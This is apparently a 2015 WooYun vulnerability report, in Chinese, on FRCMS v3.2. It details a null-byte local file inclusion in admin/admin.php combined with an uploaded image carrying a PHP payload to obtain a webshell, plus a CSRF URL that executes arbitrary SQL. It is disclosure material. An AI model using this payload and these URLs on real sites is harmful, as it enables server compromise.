当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108141

漏洞标题:嘉缘人才系统后台文件包含&Csrf执行任意sql语句(可getshell)

相关厂商:finereason.com

漏洞作者: 浅蓝

提交时间:2015-04-21 18:59

修复时间:2015-07-25 19:00

公开时间:2015-07-25 19:00

漏洞类型:文件包含

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-06-20: 细节向核心白帽子及相关领域专家公开
2015-06-30: 细节向普通白帽子公开
2015-07-10: 细节向实习白帽子公开
2015-07-25: 细节向公众公开

简要描述:

宁夏刚刚地震了。。。 而我正在提交漏洞。。。
我tm是在拿生命提交漏洞啊。。。。
地震的同时我还在写过程 脑子一抽 手一哆嗦..误删了。。。强烈要求添加一个撤销操作功能

详细说明:

首先看 admin/admin.php 最后部分的代码

}else{
$mod=$_GET['m'];$act=$_GET['a'];
aPurview($mod,$act);//检测管员权限
if(file_exists(ADMIN_ROOT.'inc/'.$mod.'.inc.php')){
require_once ADMIN_ROOT.'inc/'.$mod.'.inc.php';
//$actmod=new $mod();
// if($act&&method_exists($actmod,$act)){
// $actmod->$act();
// }else{
// $actmod->index();
// }
}
$smarty->assign('menulist',ashowmenu());
$smarty->display('index.htm');
}


如果ADMIN_ROOT.'inc/'.$mod.'.inc.php存在则包含此文件。$mod可控。 直接截断即可

N[UP%E7[DPYU@8S5YFH]F[0.jpg


包含robots.txt文件
接着 我注册一个账号 去上传图片
图片代码为

<?php file_put_contents("x.php","xxxxxxxxxxxxx");?>


这是路径/upfiles/company/file/20150415/20150415142756_455.jpg
构造如下URL
http://localhost/frcms_v3.2_GBK/uploads/admin/admin.php?m=../../upfiles/company/file/20150415/20150415142756_455.jpg%00
然后找个提交的地方 嵌入一个远程URL为以上URL 等待管理审核即可。。
我这直接在后台提交。。。

DPH7`3Y(ZNBC2[8}V@KZ1GE.png


M`5_]RW982H4OOM%@RW6`0T.png


http://localhost/frcms_v3.2_GBK/uploads/admin/admin.php?m=websys_execsql&a=doexecsql
sql=select user()&submit=+Ö´+ÐÐ+


无token 未验证referer
poc我也不填了。。都因为刚才手抖给删了。。说多了都是泪。

漏洞证明:

如上

修复方案:

求通过。。
求不忽略。。。
求高rank。。。
我可是在拿生命给你们提交漏洞啊。。。

版权声明:转载请注明来源 浅蓝@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-25 19:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-04-21 19:11 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

    强烈要求添加一个撤销操作功能